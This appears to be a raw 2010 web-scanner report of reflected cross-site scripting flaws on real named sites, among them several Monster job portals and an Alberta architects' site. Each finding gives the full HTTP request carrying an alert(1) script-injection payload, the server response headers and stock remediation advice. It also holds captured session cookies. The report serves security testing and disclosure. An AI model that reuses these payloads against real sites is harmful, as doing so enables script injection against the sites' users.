GET /COM/iview/245726341/direct6abb3'%3b94cfe8ba3bc HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7213 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 19:38:25 GMT Connection: close
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3b6b'%3ba2e100f1281 was submitted in the REST URL parameter 4. This input was echoed as e3b6b';a2e100f1281 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /COM/iview/245726341/http:e3b6b'%3ba2e100f1281/ads.bluelithium.com/clk HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7207 Content-Type: text/html Expires: 0 Connection: close Date: Fri, 26 Nov 2010 19:38:29 GMT Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a842"><script>alert(1)</script>7ee3acc8e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /firms-adopt-a-new-name-dialog2a842"><script>alert(1)</script>7ee3acc8e9/?id=675 HTTP/1.1 Host: www.consultingarchitects.ab.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: shoutsession=ujc82v0luq56n24bf2mn599ef5; __utmz=87766666.1290802610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87766666.398077842.1290802610.1290802610.1290802610.1; __utmc=87766666; __utmb=87766666.2.10.1290802610;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:52:30 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html Content-Length: 35159
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edd5c"><script>alert(1)</script>316d6f63925 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /how-to-hire-an-architectedd5c"><script>alert(1)</script>316d6f63925/?id=675 HTTP/1.1 Host: www.consultingarchitects.ab.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: shoutsession=ujc82v0luq56n24bf2mn599ef5; __utmz=87766666.1290802610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=87766666.398077842.1290802610.1290802610.1290802610.1; __utmc=87766666; __utmb=87766666.2.10.1290802610;
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:52:31 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: User-Agent,Accept-Encoding Connection: close Content-Type: text/html Content-Length: 35212
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bf2"><script>alert(1)</script>86397c89833 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /forms/pd__accounting_ifrs HTTP/1.1 Host: apegga.formbin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e6bf2"><script>alert(1)</script>86397c89833
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:23 GMT Server: Apache Set-Cookie: fspublicsession=gfdjnusj904okcpnina0vojj92; path=/ Cache-Control: max-age=0 Expires: Fri, 26 Nov 2010 19:33:23 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 36536
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40e32'-alert(1)-'766db494522 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: buscartrabajo.monster.es Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=40e32'-alert(1)-'766db494522
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:46 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=anrk3w55f15zjh55blqark55; path=/; HttpOnly Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:46 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:46 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 346833 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c07'-alert(1)-'e0c5212367e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: career-advice.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=38c07'-alert(1)-'e0c5212367e
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:27 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=gf3dkku1aqeaop45yhwvym45; path=/; HttpOnly Set-Cookie: split_scsjsv=47; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:27 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=47; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:27 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:27 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:27 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87116 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bb73'-alert(1)-'d48c97d5726 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /career-development/careers.aspx HTTP/1.1 Host: career-advice.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=1bb73'-alert(1)-'d48c97d5726
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:25 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=v5d2u045rhq44pn0izphvd55; path=/; HttpOnly Set-Cookie: split_scsjsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:25 GMT; path=/ Set-Cookie: scsjsv=1; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:25 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:25 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:25 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 73598 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fbe'-alert(1)-'bed7f82964e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in-the-workplace/careers.aspx HTTP/1.1 Host: career-advice.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=11fbe'-alert(1)-'bed7f82964e
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:29 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=n43nexzltfab1eyd5tzljv55; path=/; HttpOnly Set-Cookie: split_scsjsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/ Set-Cookie: scsjsv=1; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 74786 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bce0b'-alert(1)-'7aa36870cbf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-hunt-strategy/careers.aspx HTTP/1.1 Host: career-advice.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bce0b'-alert(1)-'7aa36870cbf
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:35 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lplur3zhp3zubq3xlqj1cnqi; path=/; HttpOnly Set-Cookie: split_scsjsv=25; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:35 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=25; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:35 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:35 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:35 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 76163 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d366'-alert(1)-'9ccc549ada5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-interview/careers.aspx HTTP/1.1 Host: career-advice.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5d366'-alert(1)-'9ccc549ada5
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:33 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=diliq045ym2f1lnothehn245; path=/; HttpOnly Set-Cookie: split_scsjsv=43; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:33 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=43; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:33 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:33 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:33 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 74601 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beeb9'-alert(1)-'81970acecbe was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resumes-cover-letters/careers.aspx HTTP/1.1 Host: career-advice.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=beeb9'-alert(1)-'81970acecbe
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:29 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=hcmhli45goeg2ur3nrjvbb45; path=/; HttpOnly Set-Cookie: split_scsjsv=2; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/ Set-Cookie: scsjsv=1; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=2; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 74675 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbac'-alert(1)-'904a6022176 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /salary-benefits/careers.aspx HTTP/1.1 Host: career-advice.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=2bbac'-alert(1)-'904a6022176
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:29 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=cdryz0eouhfjhuijz5isxy55; path=/; HttpOnly Set-Cookie: split_scsjsv=76; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=76; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:29 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:29 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 73501 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5f51'-alert(1)-'d67f0420215 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: career-services.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e5f51'-alert(1)-'d67f0420215
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:33:41 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=pbmdqjf4p5d0oz45azp05u45; path=/; HttpOnly Set-Cookie: split_scsjsv=30; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:41 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: split_ssljsv=30; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:33:41 GMT; path=/ Set-Cookie: ssljsv=1; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:33:41 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:33:41 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 35517 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ef4b'-alert(1)-'51bf3657a10 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: cercalavoro.monster.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4ef4b'-alert(1)-'51bf3657a10
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:35:11 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lgrvyy45oinouf553zaryv45; path=/; HttpOnly Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:35:11 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:35:11 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 363424 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81db5'-alert(1)-'428ed200170 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
